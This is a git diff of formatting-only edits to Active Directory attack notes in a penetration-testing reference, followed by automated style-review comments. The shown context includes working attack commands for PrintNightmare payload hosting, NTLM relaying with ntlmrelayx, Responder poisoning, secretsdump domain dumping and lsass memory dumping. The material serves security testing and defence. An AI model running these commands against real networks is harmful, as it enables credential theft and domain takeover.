diff --git a/docs/active-directory/CVE/NoPAC.md b/docs/active-directory/CVE/NoPAC.md index dd71d26..83bc4db 100644 --- a/docs/active-directory/CVE/NoPAC.md +++ b/docs/active-directory/CVE/NoPAC.md @@ -112,6 +112,7 @@ Automated exploitation: ``` **Mitigations**: + * [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) * [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) * [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) diff --git a/docs/active-directory/CVE/PrintNightmare.md b/docs/active-directory/CVE/PrintNightmare.md index 979a750..788ddee 100644 --- a/docs/active-directory/CVE/PrintNightmare.md +++ b/docs/active-directory/CVE/PrintNightmare.md @@ -6,6 +6,7 @@ The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`. The exploit will execute the DLL either from the local filesystem or a remote share. Requirements: + * **Spooler Service** enabled (Mandatory) * Server with patches < June 2021 * DC with `Pre Windows 2000 Compatibility` group @@ -14,6 +15,7 @@ Requirements: **Detect the vulnerability**: + * Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) ```ps1 python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' 
@@ -28,20 +30,23 @@ Requirements: ``` **Payload Hosting**: + * The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): -```ps1 -python3 ./smbserver.py share /tmp/smb/ -``` + ```ps1 + python3 ./smbserver.py share /tmp/smb/ + ``` * Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): -```ps1 -Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable -``` + ```ps1 + Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable + ``` * Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights): -```ps1 -SharpWebServer.exe port=8888 dir=c:\users\public verbose=true -``` + ```ps1 + SharpWebServer.exe port=8888 dir=c:\users\public verbose=true + ``` + When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll` WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: + ```ps1 cme smb -u user -p password -d domain.local -M webdav [TARGET] ``` diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index a68c2ba..c52dd73 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md 
@@ -2,11 +2,14 @@ ## Using BloodHound -Use the correct collector +Use the correct collector: + * AzureHound for Azure Active Directory * SharpHound for local Active Directory * RustHound for local Active Directory +**Examples**: + * use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) * use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) @@ -80,6 +83,7 @@ cat docker-compose.yml | docker compose -f - up ``` You can add some custom queries like : + * [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) * [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) * [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) diff --git a/docs/active-directory/ad-adds-ntds-dumping.md b/docs/active-directory/ad-adds-ntds-dumping.md index c64650e..eb96300 100644 --- a/docs/active-directory/ad-adds-ntds-dumping.md +++ b/docs/active-directory/ad-adds-ntds-dumping.md 
@@ -5,6 +5,7 @@ You will need the following files to extract the ntds : - SYSTEM hive (`C:\Windows\System32\SYSTEM`) Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. + - `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). - `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. @@ -118,6 +119,7 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. ``` :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : + - [hashmob.net](https://hashmob.net) - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) diff --git a/docs/active-directory/ad-roasting-asrep.md b/docs/active-directory/ad-roasting-asrep.md index 64945b7..7d94d58 100644 --- a/docs/active-directory/ad-roasting-asrep.md +++ b/docs/active-directory/ad-roasting-asrep.md @@ -3,6 +3,7 @@ > If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting **Requirements**: + * Accounts with the attribute **DONT_REQ_PREAUTH** * Windows/Linux: ```ps1 @@ -61,8 +62,8 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa ``` **Mitigations**: -* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). ## Kerberoasting w/o domain account 
@@ -90,6 +91,7 @@ The technique is fully explained in this article: [Semperis blog post](https://w Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html **Requirements**: + * Accounts with the attribute **DONT_REQ_PREAUTH** * Windows/Linux: ```ps1 @@ -100,7 +102,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4- PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose ``` -* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) +* Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) ```bash user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache @@ -108,6 +110,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4- ``` **Mitigations**: + * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). * Disable RC4 cipher if possible. diff --git a/docs/active-directory/ad-roasting-kerberoasting.md b/docs/active-directory/ad-roasting-kerberoasting.md index 4fa6e8b..6644e85 100644 --- a/docs/active-directory/ad-roasting-kerberoasting.md +++ b/docs/active-directory/ad-roasting-kerberoasting.md @@ -80,6 +80,7 @@ Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`) **Mitigations**: + * Have a very long password for your accounts with SPNs (> 32 characters) * Make sure no users have SPNs diff --git a/docs/active-directory/deployment-sccm.md b/docs/active-directory/deployment-sccm.md index a7dafcf..329737d 100644 --- a/docs/active-directory/deployment-sccm.md +++ b/docs/active-directory/deployment-sccm.md 
@@ -67,7 +67,8 @@ > If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. -On the machine. +On the machine + * Find SCCM blob ```ps1 Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" diff --git a/docs/active-directory/hash-capture.md b/docs/active-directory/hash-capture.md index 93e8c43..ca0e5b7 100644 --- a/docs/active-directory/hash-capture.md +++ b/docs/active-directory/hash-capture.md @@ -2,14 +2,16 @@ ## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens -> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. +> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. :information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. **Requirements**: + * LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) **Exploitation**: + * Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge ```ps1 HTTPS = On @@ -68,6 +70,7 @@ * Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` + ## Capturing and cracking Net-NTLMv2/NTLMv2 hashes If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. 
diff --git a/docs/active-directory/internal-mitm-relay.md b/docs/active-directory/internal-mitm-relay.md index 0ee12f3..b048240 100644 --- a/docs/active-directory/internal-mitm-relay.md +++ b/docs/active-directory/internal-mitm-relay.md @@ -32,11 +32,13 @@ msf exploit(smb_relay) > show targets ## LDAP signing not required and LDAP channel binding disabled During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: + * LDAP signing not required (by default set to `Not required`) * LDAP channel binding is disabled. (by default disabled) * `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. + ```bash # On first terminal sudo ./Responder.py -I eth0 -wfrd -P -v @@ -141,8 +143,8 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc ``` - - Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. + ```powershell # create a new machine account TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support 
@@ -158,6 +160,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' ## Ghost Potato - CVE-2019-1384 Requirements: + * User must be a member of the local Administrators group * User must be a member of the Backup Operators group * Token must be elevated @@ -174,6 +177,7 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe > It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine Requirements: + - a shell in session 0 (e.g. WinRm shell or SSH shell) - a privileged user is logged on in the session 1 (e.g. a Domain Admin user) @@ -189,6 +193,7 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' ## DNS Poisonning - Relay delegation with mitm6 Requirements: + - IPv6 enabled (Windows prefers IPV6 over IPv4) - LDAP over TLS (LDAPS) @@ -223,9 +228,11 @@ secretsdump.py -k -no-pass target.lab.local > Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB **Requirement**: + * WebClient service **Exploitation**: + * Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` * Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 * Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` 
@@ -267,12 +274,16 @@ pyrdp-mitm.py pyrdp-mitp.py : # with custom port pyrdp-mitm.py -k private_key.pem -c certificate.pem # with custom key and certificate ``` -* Exploitation - * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge - * If NLA is disabled, you will obtain the password in plaintext - * Other features are available such as keystroke recording -* Alternatives - * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener + +**Exploitation** + +* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge +* If NLA is disabled, you will obtain the password in plaintext +* Other features are available such as keystroke recording + +**Alternatives** + +* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener ## References diff --git a/docs/active-directory/kerberos-bronze-bit.md b/docs/active-directory/kerberos-bronze-bit.md index 7901860..051cf47 100644 --- a/docs/active-directory/kerberos-bronze-bit.md +++ b/docs/active-directory/kerberos-bronze-bit.md @@ -9,6 +9,7 @@ CVE-2020-17049 :warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)` Requirements: + * Service account's password hash * Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation` * [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013) diff --git a/docs/active-directory/kerberos-tickets.md b/docs/active-directory/kerberos-tickets.md index 82e2d70..d52279a 100644 --- a/docs/active-directory/kerberos-tickets.md +++ b/docs/active-directory/kerberos-tickets.md @@ -111,6 +111,7 @@ Converting kirbi => ccache Mitigations: + * Hard to detect because they are legit TGT tickets * Mimikatz generate a golden ticket with a life-span of 10 years 
@@ -148,6 +149,7 @@ Interesting services to target with a silver ticket : Mitigations: + * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. @@ -155,7 +157,8 @@ Mitigations: > Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key -Require: +Requirements: + * krbtgt NT Hash * krbtgt AES key @@ -172,7 +175,8 @@ Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTR The goal is to mimic the PAC field as close as possible to a legitimate one. -Require: +Requirements: + * [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) * krbtgt AES key diff --git a/docs/cheatsheets/mimikatz-cheatsheet.md b/docs/cheatsheets/mimikatz-cheatsheet.md index 7b54ffa..ffdd733 100644 --- a/docs/cheatsheets/mimikatz-cheatsheet.md +++ b/docs/cheatsheets/mimikatz-cheatsheet.md @@ -64,6 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo * Adding requires lock * Removing requires reboot + ## LSA Protection Workaround - LSA as a Protected Process (RunAsPPL) @@ -134,6 +135,7 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass. Use the minidump: + * Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` ```powershell mimikatz # sekurlsa::minidump lsass.dmp
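Review bot: In docs/active-directory/CVE/PrintNightmare.md hunk @@ -28,20 +30,23, the two-space indent now nests each fence under its `*` bullet correctly, but the re-indented `python3 ./smbserver.py share /tmp/smb/` block and the `cme smb ... -M webdav [TARGET]` block that gained a blank line are still tagged ```ps1 although both are Linux shell commands; tag those two `bash` so the highlighting matches, leaving ```ps1 only on the Invoke-BuildAnonymousSMBServer block.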
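Review bot: In docs/active-directory/ad-roasting-asrep.md hunk @@ -61,8 +62,8, the removed and added `* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).` lines are byte-for-byte identical in the rendered diff, so the only change is invisible (trailing whitespace or line ending); say so in the commit message, or drop the hunk if it was not intended.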
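Review bot: In docs/active-directory/deployment-sccm.md hunk @@ -67,7 +67,8, `On the machine.` becomes `On the machine` with no trailing punctuation, while the same commit turns `Use the correct collector` into `Use the correct collector:` in ad-adds-enumerate.md; use `On the machine:` here so list lead-ins are consistent across the docs.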
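Review bot: In docs/active-directory/hash-capture.md hunk @@ -2,14 +2,16, splitting the quote into two sentences fixes the unbalanced parenthesis, but the rewritten `+` line still reads `with the user's NT-hash as symetric keys`; since the line is being touched, correct it to `symmetric keys`.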
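Review bot: In docs/active-directory/hash-capture.md hunk @@ -68,6 +70,7, the added blank line sits directly after an existing blank one, leaving two consecutive empty lines before `## Capturing and cracking Net-NTLMv2/NTLMv2 hashes`; one blank line is enough (markdownlint MD012), so this hunk can be dropped.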
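Review bot: In docs/active-directory/internal-mitm-relay.md hunk @@ -141,8 +143,8, the blank line is moved from before the `Using any AD account, connect over SMB...` paragraph to after it, so the paragraph now starts on the line immediately following the closing ``` of the secretsdump block; keep a blank line on both sides of the paragraph (before it and before ```powershell) rather than relocating the existing one.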
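Review bot: In docs/active-directory/internal-mitm-relay.md hunk @@ -267,12 +274,16, the new `**Exploitation**` and `**Alternatives**` labels omit the trailing colon that the same file's `**Requirement**:` and `**Exploitation**:` labels carry (hunk @@ -223 of this diff); write `**Exploitation**:` and `**Alternatives**:` so the bold labels follow one convention.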
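Review bot: In docs/active-directory/kerberos-tickets.md hunk @@ -111,6 +112,7, the list now set off under `Mitigations:` contains `Hard to detect because they are legit TGT tickets` and `Mimikatz generate a golden ticket with a life-span of 10 years`, which are detection notes rather than mitigations; since the label is being reformatted, either rename it (for example `Detection notes:`) or add an actual mitigation item such as rotating the krbtgt password twice, which invalidates existing golden tickets.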
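Review bot: In docs/cheatsheets/mimikatz-cheatsheet.md hunk @@ -64,6 +64,7, the added blank line follows an existing blank line, producing two empty lines before `## LSA Protection`; a single blank line is sufficient (markdownlint MD012), so this hunk is not needed.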